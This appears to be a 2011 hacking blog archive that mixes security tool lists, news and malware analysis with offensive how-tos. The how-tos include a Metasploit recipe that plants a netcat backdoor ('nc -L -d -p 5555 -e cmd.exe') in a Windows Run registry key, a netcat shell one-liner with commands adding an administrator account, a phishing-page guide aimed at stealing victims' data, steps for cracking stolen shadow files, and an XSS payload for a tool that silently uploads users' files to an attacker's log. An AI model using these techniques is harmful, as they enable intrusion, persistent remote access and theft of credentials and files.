Mar 11, 2011

7 Best Security Tools In Ubuntu

Ubuntu is a computer operating system that is based on Linux/GNU, it is a free and open source operating system a free community developed it. Ubuntu is available and can be use for both desktop and server. It is easy to install and use both via flash drive or via compact disk.

Security is the main concern of our blog, so in this article we will talk about the security tools that are available on ubuntu, to install this tool open terminal Applications->Accessories->Terminal

Wireshark - Network Traffic Analyzer
A sniffer is a tool that used to capture the ingoing and outgoing traffic from a wire on a network, it it also called a packet analyser. To get Wireshark on ubuntu type:
sudo aptitude install wireshark

Nessus - Remote network security auditor
Nessus is a world class active vulnerability scanner, nessus is used for multi task such as configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. To install Nessus on ubuntu type on terminal:
sudo aptitude install nessus

Nmap - The Network Mapper
Nmap or network mapper is a world class tool to perform network exploration and security auditing, it is a open source and freely available. Administrator also find it useful on network inventory and monitoring host on the network. It can finger print the operating system running on the desired IP. To get Nmap on ubuntu type:
sudo aptitude install nmap 

Kismet - Wireless 802.11b monitoring tool
Kismet is a wireless network detector, sniffer and intrusion detection, it is work on data link layer of OSI model. To get Kismet on ubuntu type:
sudo aptitude install kismet

Netcat - TCP/IP swiss army knife 
Netcat normally known as swiss army knife, it is used for multi purpose like monitoring of inbond and outbond traffic of TCP and UDP, DNS forward and reverse checking, port scanning etc. To get netcat on ubuntu type:
sudo aptitude install netcat 

John the Ripper

John the Ripper is a free and open source password cracker tool, it offers both brute force and dictionary attack. It is used by the administrator to find out the weak passwords. To install john in ubuntu type.

sudo aptitude install john  

Snort - Flexible Network Intrusion Detection System
Snort is network intrusion detection system, we have previously shared a article on intrusion detection click here. To install snort on ubuntu type:
sudo aptitude install snort  

Alert by twitter when you get the session with Metasploit.

This video I will show PoC of "Alert to my twitter when I get the session with Metasploit". This video I created 2 months ago.

If you want to do like this try it.

Mar 10, 2011

Netcat Persistence After Exploit

After I watched "Uploading A Backdoor Metasploit Netcat" [] by avhackers0, I summary it like this.

1. Exploit with metasploit and you got session.
2. Interactive with the session.
3. upload nc to victim.
   meterpreter> upload netcat.exe C:\\WINDOWS\\SYSTEM32\\
4. Modify the registry for run nc with listen mode.
   meterpreter> reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Windows Live -d "C:\\WINDOWS\\SYSTEM32\\nc.exe -L -d -p 5555 -e cmd.exe"
5. Check the registry.
   meterpreter> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
6. When victim reboot computer, netcat will listen on port 5555 with interactive mode of cmd.exe
7. Try to connect the victim with
   nc $victimip 5555

Mar 9, 2011

“Phishing” with Google

In this post I’ll explain how you can do a “phishing” page on (  It’s very easy.  Any guy can create a fake but realistic webpage in only 5 min to steal important informations from victims through keyloggers / stealers / rats / viruses / etc.
What you must to do:
1. Search a “custom google search” code:
<input type=”hidden” name=”client” value=”pub-9434712357021925″></input>
<input type=”hidden” name=”forid” value=”1″></input>
<input type=”hidden” name=”channel” value=”8358634924″></input>
<input type=”hidden” name=”ie” value=”ISO-8859-1″></input>
<input type=”hidden” name=”oe” value=”ISO-8859-1″></input>
<input type=”hidden” name=”cof” value=”GALT:#008000;GL:1;DIV:#FFFFFF;VLC:663399;AH:center;BGC:FFFFFF;LBGC:D45521;ALC:0000FF;LC:0000FF;T:000000;GFNT:0000FF;GIMP:0000FF;LH:40;LW:100;L:;S:http://;LP:1;FORID:1″></input>
<input type=”hidden” name=”hl” value=”en”></input>
URL example:
  • BGC:000000; -> BackGround Color
  • AH:center; ->Position of image
  • LW:150; -> Width of image
  • LH:150; -> Height of image etc.
Let’s see a simple page:

Hmm, it’s too easy to read the URL? If yes, we can add some random characters:
Much better.
Now with some imagination and a fake sent emails inbox you can do “beautifull” things.

Google Chrome Security Update – Phishing Page


Linux Password Cracking [Backtrack4 User]

1. Get the /etc/passwd and /etc/shadow with your skills.
2. Go to /pentest/passwords/jtr
3. Use unshadow command to combine shadow and passwd file
    unshadow passwd shadow > combine-passwd
4. Use john to crack the password
    ./john combine-passwd
5. Show the password
   ./john -show combine-passwd

XSS-Track now steals your uploaded files with HTML5 power!

HTML5, broadly speaking (actually it's XMLHttpRequest Level 2, not being part of HTML5 spec, but who cares?) has yet another neat feature: it allows you to send files through AJAX requests. Of course, cross domain communication is also possible. Which is generally a good thing... unless you have an XSS on your site that can now capture files you intend to upload and send them also to a third-party server.

Which is exactly what I have done in newest XSS-Track. Now you can append files=1 parameter to script URL (e.g. ) and it will monitor the site for any <input type="file" /> elements. When you change() them (e.g. by choosing a file from your hard-drive), it will quietly start uploading the chosen file meta-data (name, size, MIME type) and file contents to log.php.

As the user will be doing twice as much uploads (one for legitimate site, one for us), XSS-Track does not wait for the form to be actually submitted, but it starts quietly uploading as soon as the field changes.


This works also for <input type="file" multiple />. Currently supporting browsers that I'm aware of are:
  • Chrome,
  • FF 3.6 (meta-data only)
  • FF 4.0
  • ... and many more in the future as HTML5 is coming :)
Of course, if a browser doesn't support AJAX file upload, it will stay quiet. The log.php script will store the files in captured_files subdirectory.


Go on, try it now!

Vulnerable application:

Payload (paste into textarea):
</textarea><script src="//">

Monitoring (you will only see your own IP actions):

Clearing logs:

Source code:


USB driver bug exposed as "Linux plug&pwn"

 Rafael Dominguez Vega of MRW InfoSecurity has reported a bug in the Caiaq USB driver which could be used to gain control of a Linux system via a USB device.

The bug is caused by the device name being copied into a memory area with a size of 80 bytes using strcpy() without its length being tested. A crafted device with a long device name could thus write beyond the limits of this buffer, allowing it to inject and execute code. Because the driver is included, and automatically loaded, in most Linux distributions, to execute code in kernel mode an attacker would merely have to connect such a device to a Linux system's USB port.
MRW says that it has assembled a suitable USB device for this purpose, boasting in a Tweet of a "Linux plug&pwn". Their derision is not entirely misplaced – buffer overflows arising from the use of strcpy() are something of a 20th century problem. Microsoft, for example, placed the function on its list of banned function calls some years ago, with the result that developers can no longer check in code containing the incriminating function. The fact that this function call was used in a Linux kernel driver and only replaced by the safer, length checking strlcpy() on 14 February 2011 is not a ringing endorsement of its quality.
To exploit this vulnerability, an attacker would nonetheless require physical access to the target system. Despite this limitation, such vulnerabilities are apparently highly sought after. US security company HBGary developed a complete framework for spying on and compromising computers via USB, FireWire and other ports under the codename Task B. The main customer for this was defence contractor General Dynamics, which supplies a range of US military and secret service agencies. Target price: around $400,000.
In one email, a General Dynamics employee described two key deployment scenarios: the first of these envisages a person leaving their laptop unattended in a locked state, allowing an attacker to briefly insert and then remove an appropriate device. In the second scenario the device is secretly inserted into a dormant PC, where it will hopefully remain undetected when the computer is turned back on and can be collected at a later date. Both scenarios are able to bypass full hard drive encryption, as the computer is accessed when on, with the system transparently decrypting all files.


Mar 8, 2011

Malware Domain List

I'm interested in sites wich are posting links to malware sites.
For example:
I'm using these sites to download fresh actual malware samples, and I need more sources.

Please share links to such sites, if you have one.
Now I'm getting samples from next sites:


Netcat - the magical tool

It is not possible to describe all the functionality of netcat in one post. But one thing is for sure - it is magic.
Let's start from the beginning. Netcat is program that can read and write data across network connections.
You can read all about it here. And if it doesn't sound interesting, trust me it is a hackers tool. The only way to understand it is to download it and play with it. There is versions for Windows, Linux, and Mac OS, all free so it will be easy to find it for your OS. Write in the console "nc" to find out do you have it installed already. 
If every thing is OK and you installed successfully check out my favorites videos on YouTube about netcat.

Summary From The Video:
Act as Server: nc -lvp $PORTNUMBER -e cmd.exe
Connect to Server: nc -vv $IPADDRESS $PORTNUMBER
Add User: net user username /add
Add User To Administrators Group: net localgroup administrators username /add

Netcat is a powerful tool, take your time with it and it will reward you.


How to capture data and passwords of unsecured wireless networks with SniffPass and SmartSniff

In the release details, I also specified that 'Wifi Monitor Mode' button was added for using 'Monitor Mode' under Windows Vista/7/2008, but without giving extensive explanation about how to use this feature. So in this blog post, I'll add more details about this 'Wifi Monitor Mode' and how to use it on SmartSniff and SniffPass.

When a wireless network card enters into a 'Monitor Mode', it listens to specific channel that you choose and captures all the packets that are sent by wireless networks on your area in the specific channel that you selected.  If the wireless network that sent the packet is unsecured,   SmartSniff and SniffPass will be able to show you the packets data.
Before I start to explain you how to use this mode, here's the system requirements for using  'Monitor Mode':
  1. Unfortunately, this mode is only supported on Windows Vista, Windows 7, and Windows Server 2008. Windows XP is not supported.
  2. Both the network card and the device driver must support this mode. I currently don't have a list network cards that support this mode under Windows. However, if you manage to get your card into monitor mode, it'll be nice if you post your card model as comment to this Blog post.
    Also, be aware that according to Microsoft, some Wifi drivers may cause a system crash when entering into monitor mode.
Finally, here's the instructions for using 'Wifi Monitor Mode' with SmartSniff and SniffPass:
  1. First, download and install the latest version of Microsoft Network Monitor 3.x if it's not already installed on your system.
  2. Run SmartSniff if you want to capture general TCP data or SniffPass if  you only want to capture passwords. Be aware that SniffPass can only capture passwords that are not encrypted. Most Web sites and services of large companies use SSL to encrypt the passwords, and thus SniffPass cannot capture them.
  3. Go to the 'Capture Options' window (F9), choose  'Network Monitor Driver 3.x' as a capture method, and then click the 'Wifi Monitor Mode' button.
  4. In the opened 'Wifi Scanning Options' window, choose the right wireless card (in most cases you should have only one) and then check the 'Switch to Monitor Mode' option.
  5. You can now select to scan a single channel or to switch between multiple channels every x milliseconds.  After you selected the desired channels, click the Apply button.
    Wifi Scanning Options
    Wifi Scanning Options
  6. The most important thing: Leave this window opened !
    When you close this window, the network card will exit from monitor mode and it'll return back to its normal state.
  7. In 'Capture Options' window of SmartSniff/SniffPass - select the right wireless card and then press the 'Ok' .
  8. Finally, press F5 to start the capture. If you have any active unsecured networks in your area, you'll be able to see the captured data.
  9. After you finish, close the 'Wifi Scanning Options' window, so your wireless card will return back to normal.
The information in this article is provided for educational purposes only and for making people aware of the risks of using unsecured wireless networks.  it's not intended to be used for any illegal activity.


TIGERBLOOD #Winning with Metasploit

Yes, just when you thought Charlie Sheen was about to dethrone Chuck Norris as the king of the internet…. I present to you the 0wn everything script, brought to you by Tigerblood and #Winning!
I thought long and hard (at least 20 seconds… no really, I did) about releasing this on the internet. Sometimes you just have to believe and starting #winning

The script –> /exploit/multi/everything/tigerblood.rb

* Please note… this is a dangerous script, as can be seen by the fact that it takes no RHOST input. It owns without mercy…. you have been warned!


WCE v1.1 is out!

Windows Credentials Editor v1.1
(c) 2010, 2011 Amplia Security, Hernan Ochoa
written by:

Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes). This can be used, for example, to perform pass-the-hash on Windows and also obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used in further attacks.

WCE v1.1 supports obtaining logon sessions and NTLM credentials just by reading
memory without performing code injection.

Supported Platforms
Windows Credentials Editor supports Windows XP, 2003, Vista, 7 and 2008

This tool requires administrator privileges.

Windows Credentials Editor provides the following options:

    -l        List logon sessions and NTLM credentials (default).
    -s        Changes NTLM credentials of current logon session.
            Parameters: :::.
    -r        Lists logon sessions and NTLM credentials indefinitely.
            Refreshes every 5 seconds if new sessions are found.
            Optional: -r.
    -c        Run in a new session with the specified NTLM credentials.
            Parameters: .
    -e        Lists logon sessions NTLM credentials indefinitely.
            Refreshes every time a logon event occurs.
    -o        saves all output to a file.
            Parameters: .
    -i        Specify LUID instead of use current logon session.
            Parameters: .
    -d        Delete NTLM credentials from logon session.
            Parameters: .
    -a        Use Addresses.
    -f        Force 'safe mode'.
    -v        verbose output.


    * List current logon sessions

C:\>wce -l
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (
Use -h for help.


    * List current logon sessions with verbose output enabled

C:\>wce -l -v
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (
Use -h for help.

Current Logon Session LUID: 00064081h
Logon Sessions Found: 8


    * Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (
Use -h for help.

Changing NTLM credentials of current logon session (00064081h) to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

    * Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Och
oa (
Use -h for help.

Changing NTLM credentials of logon session 000003E5h to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

    * Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (
Use -h for help.

NTLM credentials successfully deleted!

    * Run WCE indefinitely, waiting for new credentials/logon sessions.
    Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e

    * Run WCE indefinitely, waiting for new credentials/logon sessions
    Refresh is every 5 seconds by default.

C:\>wce -r

    * Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes very 5 seconds)

C:\>wce -r5

This tool can be used to obtain automatically needed addresses for WCE
to be able to read logon sessions and NTLM credentials from memory.

Addresses obtained can then be used with WCE using the -A switch.

This tool requires the dlls symsrv.dll and dbghelp.dll available from the
"Debugging Tools for Windows" package.



Embedded JavaScript in SWF

In a blog published in November titled “Explore the CVE-2010-3654 matryoshka“, we discussed a 0-day Shockwave (SWF) exploit that uses JavaScript to do malicious actions. In this blog, we discuss another advanced way SWF malware is combined with JavaScript only this time, without using a 0-day exploit.

In January we noticed a very large spike in telemetry for a threat named Trojan:SWF/Jaswi.A. Going back to December 2010, we had picked up a few spikes for this issue, one around Christmas, a second after New Year’s, a second after New Year’s and then a third and largest spike the weekend after New Year’s:

Image 1a – Prevalence chart for Trojan:SWF/Jaswi.A
Image 1a – Prevalence chart for Trojan:SWF/Jaswi.A

When we looked deeper into the targets of these attacks, we discovered that they were predominantly reported by computers in South Korea. Since the beginning of this year, 89% of the targets were in South Korea with 75% of them specifically in Seoul. Here’s a chart with a breakdown by unique machines in the months January and February of this year (there has been no activity in March):

Image 1b – Attack attempts by unique machines in the months January and February of 2011

Image 1b – Attack attempts by unique machines in the months January and February of 2011
Interested in the anomaly, I decided to have a look. After spending some time reviewing it, an interesting thing emerged. The malware Trojan:SWF/Jaswi.A is unlike other SWF malware; other SWF malware typically calls “getURL <website address>” within an ACTION tag in order to visit a malicious website link without user consent. For more about this, see the following:
Trojan:SWF/Jaswi.A contains an embedded malicious JavaScript that initiates a legal Windows API call to trigger the payload. Although the analysis was only slightly involved, let’s take a simple step by step tour of the malware.

1. SWF with embedded JavaScript
Image 2 – Embedded JavaScript within Trojan:SWF/Jaswi.A
Image 2 – Embedded JavaScript within Trojan:SWF/Jaswi.A

If we convert the JavaScript into Actionscript, it should appear as below:
Image 3 – JavaScript from Image 1 converted to Actionscript illustrating Windows API call
Image 3 – JavaScript from Image 2 converted to Actionscript illustrating Windows API call

From the image above, we can see the legal function has been made to complete a procedure of initiating JavaScript injection. Well, this is not a new method after all, but only a few SWF malware take advantage of this technique.

2. JavaScript obfuscation
We notice the embedded JavaScript is also simply encrypted by a method “fromCharCode()”. After decryption, the real JavaScript code appears (edited below):

Image 4 – Decrypted JavaScript with black-outs added

Looks familiar? Yes, the Microsoft Internet Explorer vulnerability CVE-2010-0806 has been abused! This particular exploit affects Microsoft Internet Explorer versions 6, 6+SP1 and 7, and could allow a remote attacker to execute arbitrary code.

3. Shellcode
In Image 4 above, you can see Unicode encrypted by the method “unescape()” – this is the malware shellcode body, which includes a simple xor algorithm to avoid the detection. Further into the obfuscation, we finally see the destination, show below:

Image 5 – Destination URL indicating an executable named “uusee.exe”
Image 5 – Destination URL indicating an executable named “uusee.exe”

The file “uusee.exe” from the obfuscated URL shown above is actually a prevalent password stealer in China that Microsoft antimalware technologies detects as PWS:Win32/Lolyda.AU (SHA1: 0bd98a39c2eaa9c523e41cec250623b44f6d3239).
We mentioned the embedded JavaScript technique used in the malicious SWF here because it appears to be a trend and may become a popular method. As always, use caution while surfing the Interwebs and use on-access antimalware protection from a credible scanner (for more information on antimalware software, see


Mar 7, 2011

Metasploit v.3.6.0 Released

All Metasploit editions are seeing an update to version 3.6 today, including an enhanced command-line feature set for increased proficiency and detailed PCI reports with pass/fail information for a comprehensive view of compliance posture with PCI regulations.

This release adds 15 new exploits for a total of 64 new modules since version 3.5.1. All editions of Metasploit now include Post Exploitation modules that provide local exploits and additional data gathering capabilities. Metasploit Express and Metasploit Pro users benefit from the Project Activity Report and Global Search capabilities now available in the user interface. Metasploit Pro users now have access to the new Pro Console, PCI Report, and Asset Tagging features. The full release notes for the open source framework can be found online.

More info and download:

Shell script for update path /pentest/ in Backtrack4

This is a script that I create to update /pentest/$APP in Backtrack4 with svn update.


for deep1 in `ls /pentest`
        for deep2 in `ls /pentest/$deep1`
                cd /pentest/$deep1/$deep2
                echo "Updated: /pentest/$deep1/$deep2"
                svn update